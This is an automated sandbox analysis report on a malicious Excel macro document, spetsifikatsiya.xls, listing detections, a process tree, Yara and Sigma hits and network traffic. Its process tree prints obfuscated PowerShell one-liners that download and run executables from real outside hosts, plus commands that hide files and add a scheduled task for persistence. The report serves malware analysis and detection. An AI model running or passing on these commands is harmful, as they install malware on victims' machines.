Play interactive tour

Edit tour

Analysis Report spetsifikatsiya.xls

Overview

General Information

Sample Name:	spetsifikatsiya.xls
Analysis ID:	336052
MD5:	bf9774e5063791aba95abb5b808aea43
SHA1:	2774db354121fd9080d86623e8e854af967b14cf
SHA256:	bcac1e33956458b61bbc185ad3861e385f863ec9bb9232e67eea95282929ce30
Tags:	SilentBuilderxls
Most interesting Screenshot:

Detection

Hidden Macro 4.0

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Sigma detected: Scheduled temp file as task from temp location

Yara detected AntiVM_3

Contains functionality to hide a thread from the debugger

Document exploit detected (process start blacklist hit)

Found Excel 4.0 Macro with suspicious formulas

Found obfuscated Excel 4.0 Macro

Hides threads from debuggers

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Obfuscated command line found

Powershell drops PE file

Sigma detected: Microsoft Office Product Spawning Windows Shell

Suspicious powershell command line found

Tries to download and execute files (via powershell)

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected Obfuscated Powershell

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Document contains embedded VBA macros

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Installs a global mouse hook

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Sleep loop found (likely to delay execution)

Tries to load missing DLLs

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 944 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

cmd.exe (PID: 2504 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

powershell.exe (PID: 2364 cmdline: powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP' MD5: 852D67A27E454BD389FA7F02A8CBE23F)

cmd.exe (PID: 2524 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

powershell.exe (PID: 2704 cmdline: powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force MD5: 852D67A27E454BD389FA7F02A8CBE23F)

cmd.exe (PID: 2316 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

powershell.exe (PID: 2852 cmdline: powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat MD5: 852D67A27E454BD389FA7F02A8CBE23F)

attrib.exe (PID: 3036 cmdline: 'C:\Windows\system32\attrib.exe' +s +h pd.bat MD5: C65C20C89A255517F11DD18B056CADB5)

cmd.exe (PID: 1616 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

powershell.exe (PID: 2480 cmdline: powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat' MD5: 852D67A27E454BD389FA7F02A8CBE23F)

cmd.exe (PID: 2164 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat'' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

mode.com (PID: 1944 cmdline: mode 18,1 MD5: 718E86CB060170430D4EF70EE39F93D4)

cmd.exe (PID: 2320 cmdline: C:\Windows\system32\cmd.exe /c ver MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

cmd.exe (PID: 2232 cmdline: Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://speed-bg.com/kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe',($env:appdata)+'\sb.exe');Start-Sleep 2; Start-Process $env:appdata\sb.exe;' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

powershell.exe (PID: 1520 cmdline: powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://speed-bg.com/kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe',($env:appdata)+'\sb.exe');Start-Sleep 2; Start-Process $env:appdata\sb.exe; MD5: 852D67A27E454BD389FA7F02A8CBE23F)

sb.exe (PID: 1464 cmdline: 'C:\Users\user\AppData\Roaming\sb.exe' MD5: 1C1BDD57483BBFBB497B4596BE12B053)

schtasks.exe (PID: 2436 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\axoikBEWgDCn' /XML 'C:\Users\user\AppData\Local\Temp\tmp8C58.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

sb.exe (PID: 1192 cmdline: {path} MD5: 1C1BDD57483BBFBB497B4596BE12B053)

cmd.exe (PID: 2772 cmdline: cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/4jsSu5Q','pd.bat') MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

powershell.exe (PID: 1468 cmdline: powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/4jsSu5Q','pd.bat') MD5: 852D67A27E454BD389FA7F02A8CBE23F)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
spetsifikatsiya.xls	SUSP_Excel4Macro_AutoOpen	Detects Excel4 macro use with auto open / close	John Lambert @JohnLaTwC	0x0:$header_docf: D0 CF 11 E0 0x393c2:$s1: Excel 0x35aaf:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	SUSP_PowerShell_Caret_Obfuscation_2	Detects powershell keyword obfuscated with carets	Florian Roth	0x12607:$r1: p^owersh^el^l 0x128a3:$r1: p^owersh^el^l 0x12b83:$r1: p^owersh^el^l 0x12dd3:$r1: p^owersh^el^l 0x12607:$r2: p^owersh^el^l 0x128a3:$r2: p^owersh^el^l 0x12b83:$r2: p^owersh^el^l 0x12dd3:$r2: p^owersh^el^l
dump.pcap	JoeSecurity_ObfuscatedPowershell	Yara detected Obfuscated Powershell	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\Documents\pd.bat	SUSP_PowerShell_Caret_Obfuscation_2	Detects powershell keyword obfuscated with carets	Florian Roth	0xd4:$r1: p^owersh^el^l 0x370:$r1: p^owersh^el^l 0x60a:$r1: p^owersh^el^l 0x85a:$r1: p^owersh^el^l 0xd4:$r2: p^owersh^el^l 0x370:$r2: p^owersh^el^l 0x60a:$r2: p^owersh^el^l 0x85a:$r2: p^owersh^el^l
C:\Users\user\Documents\pd.bat	JoeSecurity_ObfuscatedPowershell	Yara detected Obfuscated Powershell	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000018.00000002.2229844300.0000000002900000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000011.00000002.2120343706.000000000389B000.00000004.00000001.sdmp	SUSP_PowerShell_Caret_Obfuscation_2	Detects powershell keyword obfuscated with carets	Florian Roth	0x1afda:$r1: p^owersh^el^l 0x1b276:$r1: p^owersh^el^l 0x1b510:$r1: p^owersh^el^l 0x1b760:$r1: p^owersh^el^l 0x1d674:$r1: p^owersh^el^l 0x1d910:$r1: p^owersh^el^l 0x1dbaa:$r1: p^owersh^el^l 0x1ddfa:$r1: p^owersh^el^l 0x1e0bc:$r1: p^owersh^el^l 0x1e358:$r1: p^owersh^el^l 0x1e5f2:$r1: p^owersh^el^l 0x1e842:$r1: p^owersh^el^l 0x1afda:$r2: p^owersh^el^l 0x1b276:$r2: p^owersh^el^l 0x1b510:$r2: p^owersh^el^l 0x1b760:$r2: p^owersh^el^l 0x1d674:$r2: p^owersh^el^l 0x1d910:$r2: p^owersh^el^l 0x1dbaa:$r2: p^owersh^el^l 0x1ddfa:$r2: p^owersh^el^l 0x1e0bc:$r2: p^owersh^el^l

Sigma Overview

System Summary:

Sigma detected: Scheduled temp file as task from temp location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\axoikBEWgDCn' /XML 'C:\Users\user\AppData\Local\Temp\tmp8C58.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\axoikBEWgDCn' /XML 'C:\Users\user\AppData\Local\Temp\tmp8C58.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\AppData\Roaming\sb.exe' , ParentImage: C:\Users\user\AppData\Roaming\sb.exe, ParentProcessId: 1464, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\axoikBEWgDCn' /XML 'C:\Users\user\AppData\Local\Temp\tmp8C58.tmp', ProcessId: 2436

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis: Data: Command: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP', CommandLine: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP', CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 944, ProcessCommandLine: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP', ProcessId: 2504

Sigma detected: Hiding Files with Attrib.exe

Show sources

Source: Process started

Author: Sami Ruohonen: Data: Command: 'C:\Windows\system32\attrib.exe' +s +h pd.bat, CommandLine: 'C:\Windows\system32\attrib.exe' +s +h pd.bat, CommandLine|base64offset|contains: , Image: C:\Windows\System32\attrib.exe, NewProcessName: C:\Windows\System32\attrib.exe, OriginalFileName: C:\Windows\System32\attrib.exe, ParentCommandLine: powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2852, ProcessCommandLine: 'C:\Windows\system32\attrib.exe' +s +h pd.bat, ProcessId: 3036

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\axoikBEWgDCn.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\sb.exe	Joe Sandbox ML: detected

Source: sb.exe

Binary or memory string: -----BEGIN PUBLIC KEY-----

Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: 27_2_00426F7A GetFullPathNameW,FindFirstFileExW,GetLastError,		27_2_00426F7A
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: 27_2_005C7F30 FindFirstFileW,GetLastError,		27_2_005C7F30

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\cmd.exe

Jump to behavior

Source: global traffic

DNS query: name: cutt.ly

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 104.22.0.232:443

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 104.22.0.232:443

Source: global traffic

TCP traffic: 192.168.2.22:49171 -> 185.157.162.81:1973

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 05 Jan 2021 09:06:47 GMTServer: Apache mod_bwlimited/1.4Upgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Tue, 05 Jan 2021 00:27:38 GMTETag: "74e447a-353000-5b81c46187603"Accept-Ranges: bytesContent-Length: 3485696Keep-Alive: timeout=5Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 c1 b1 f3 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 1a 35 00 00 14 00 00 00 00 00 00 b2 38 35 00 00 20 00 00 00 40 35 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 35 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 60 38 35 00 4f 00 00 00 00 40 35 00 84 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 35 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b8 18 35 00 00 20 00 00 00 1a 35 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 84 11 00 00 00 40 35 00 00 12 00 00 00 1c 35 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 35 00 00 02 00 00 00 2e 35 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 94 38 35 00 00 00 00 00 48 00 00 00 02 00 05 00 20 5d 00 00 c0 43 00 00 03 00 00 00 65 00 00 06 e0 a0 00 00 80 97 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5e 02 14 7d 01 00 00 04 02 28 15 00 00 0a 00 00 02 28 04 00 00 06 00 2a 0a 00 2a 00 13 30 02 00 2b 00 00 00 01 00 00 11 00 03 2c 0b 02 7b 01 00 00 04 14 fe 03 2b 01 16 0a 06 2c 0e 00 02 7b 01 00 00 04 6f 16 00 00 0a 00 00 02 03 28 17 00 00 0a 00 2a 00 13 30 05 00 dd 07 00 00 02 00 00 11 00 d0 02 00 00 02 28 18 00 00 0a 73 19 00 00 0a 0a 02 73 1a 00 00 0a 7d 02 00 00 04 02 73 1b 00 00 0a 7d 04 00 00 04 02 73 1b 00 00 0a 7d 05 00 00 04 02 73 1b 00 00 0a 7d 06 00 00 04 02 73 1b 00 00 0a 7d 07 00 00 04 02 73 1c 00 00 0a 7d 08 00 00 04 02 73 1d 00 00 0a 7d 09 00 00 04 02 73 1e 00 00 0a 7d 03 00 00 04 02 7b 02 00 00 04 6f 1f 00 00 0a 00 02 7b 03 00 00 04 6f 20 00 00 0a 00 02 28 1f 00 00 0a 00 02 7b 02 00 00 04 18 6f 21 00 00 0a 00 02 7b 02 00 00 04 6f 22 00 00 0a 18 22 00 00 04 42 73 23 00 00 0a 6f 24 00 00 0a 26 02 7b 02 00 00 04 6f 22 00 00 0a 18 22 00 00 86 42 73 23 00 00

Source: global traffic	HTTP traffic detected: GET /bat/scriptxls_687c7069-ef4b-4efe-b745-594285a9a92b_mic2_wddisabler.bat HTTP/1.1Host: 37.46.150.139Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe HTTP/1.1Host: speed-bg.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 185.157.162.81 185.157.162.81
Source: Joe Sandbox View	IP Address: 104.22.0.232 104.22.0.232

Source: Joe Sandbox View	ASN Name: TELEPOINTBG TELEPOINTBG
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d

Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.162.81

Source: global traffic	HTTP traffic detected: GET /bat/scriptxls_687c7069-ef4b-4efe-b745-594285a9a92b_mic2_wddisabler.bat HTTP/1.1Host: 37.46.150.139Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe HTTP/1.1Host: speed-bg.comConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: cutt.ly

Source: powershell.exe, 00000007.00000002.2110085564.0000000002420000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2129560236.0000000002450000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2106880201.0000000002390000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2157964975.0000000002360000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000007.00000002.2110085564.0000000002420000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2129560236.0000000002450000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2106880201.0000000002390000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2157964975.0000000002360000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 0000000A.00000002.2128348191.000000000037E000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/
Source: powershell.exe, 0000000A.00000002.2128348191.000000000037E000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/cc
Source: powershell.exe, 00000007.00000002.2107902230.00000000000EE000.00000004.00000020.sdmp, powershell.exe, 0000000A.00000002.2128348191.000000000037E000.00000004.00000020.sdmp, powershell.exe, 0000000E.00000002.2106136798.00000000000DE000.00000004.00000020.sdmp, powershell.exe, 00000010.00000002.2157320922.000000000032E000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 0000000E.00000002.2106136798.00000000000DE000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.c
Source: powershell.exe, 00000010.00000002.2157320922.000000000032E000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleaner7
Source: powershell.exe, 00000007.00000002.2107902230.00000000000EE000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: powershell.exe, 0000000A.00000002.2128348191.000000000037E000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerv
Source: sb.exe	String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443

Source: C:\Users\user\AppData\Roaming\sb.exe

Windows user hook set: 0 mouse low level NULL

Jump to behavior

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: dump.pcap, type: PCAP	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000011.00000002.2120343706.000000000389B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: C:\Users\user\Documents\pd.bat, type: DROPPED	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Document image extraction number: 0	Screenshot OCR: document is protected 1. Open the document in Ljivmjt' iS not available for protected documents.
Source: Document image extraction number: 0	Screenshot OCR: protected documents. 2. If this document was downloaded from your email, please click EnUk Editim
Source: Document image extraction number: 1	Screenshot OCR: document is protected 1. Qpen the document in Microsoft Offiu'. Prrvirwing onlinr is not availabk

Found Excel 4.0 Macro with suspicious formulas

Show sources

Source: spetsifikatsiya.xls

Initial sample: EXEC

Found obfuscated Excel 4.0 Macro

Show sources

Source: spetsifikatsiya.xls

Initial sample: High usage of CHAR() function: 21

Powershell drops PE file

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\sb.exe

Jump to dropped file

Source: C:\Users\user\AppData\Roaming\sb.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\AppData\Roaming\sb.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Users\user\AppData\Roaming\sb.exe

Code function: 27_2_00478772 __EH_prolog,GetModuleHandleA,GetProcAddress,GetCurrentThread,NtSetInformationThread,

27_2_00478772

Source: C:\Users\user\AppData\Roaming\sb.exe

Code function: 27_2_005C6B10: new,DeviceIoControl,

27_2_005C6B10

Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: 24_2_00326C3C	24_2_00326C3C
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: 24_2_00321800	24_2_00321800
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: 24_2_00325108	24_2_00325108
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: 24_2_00325968	24_2_00325968
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: 24_2_00322E00	24_2_00322E00
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: 24_2_00326414	24_2_00326414
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: 24_2_0032F904	24_2_0032F904
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: 24_2_00325958	24_2_00325958
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: 24_2_003251C8	24_2_003251C8
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: 24_2_0032F29B	24_2_0032F29B
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: 24_2_00322B58	24_2_00322B58
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: 24_2_0032F740	24_2_0032F740
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: 24_2_00322B47	24_2_00322B47
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: 24_2_00328FB6	24_2_00328FB6
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: 24_2_003217F8	24_2_003217F8
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: 24_2_00340C5F	24_2_00340C5F
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: 24_2_009B2AF7	24_2_009B2AF7
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: 24_2_009B2B1C	24_2_009B2B1C
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: 24_2_003204FC	24_2_003204FC
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: 24_2_00320500	24_2_00320500
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: 27_2_006940D0	27_2_006940D0
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: 27_2_006849A0	27_2_006849A0
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: 27_2_0040EA7D	27_2_0040EA7D
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: 27_2_004F2AA7	27_2_004F2AA7
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: 27_2_0042ABC1	27_2_0042ABC1
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: 27_2_0068321E	27_2_0068321E
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: 27_2_00411532	27_2_00411532
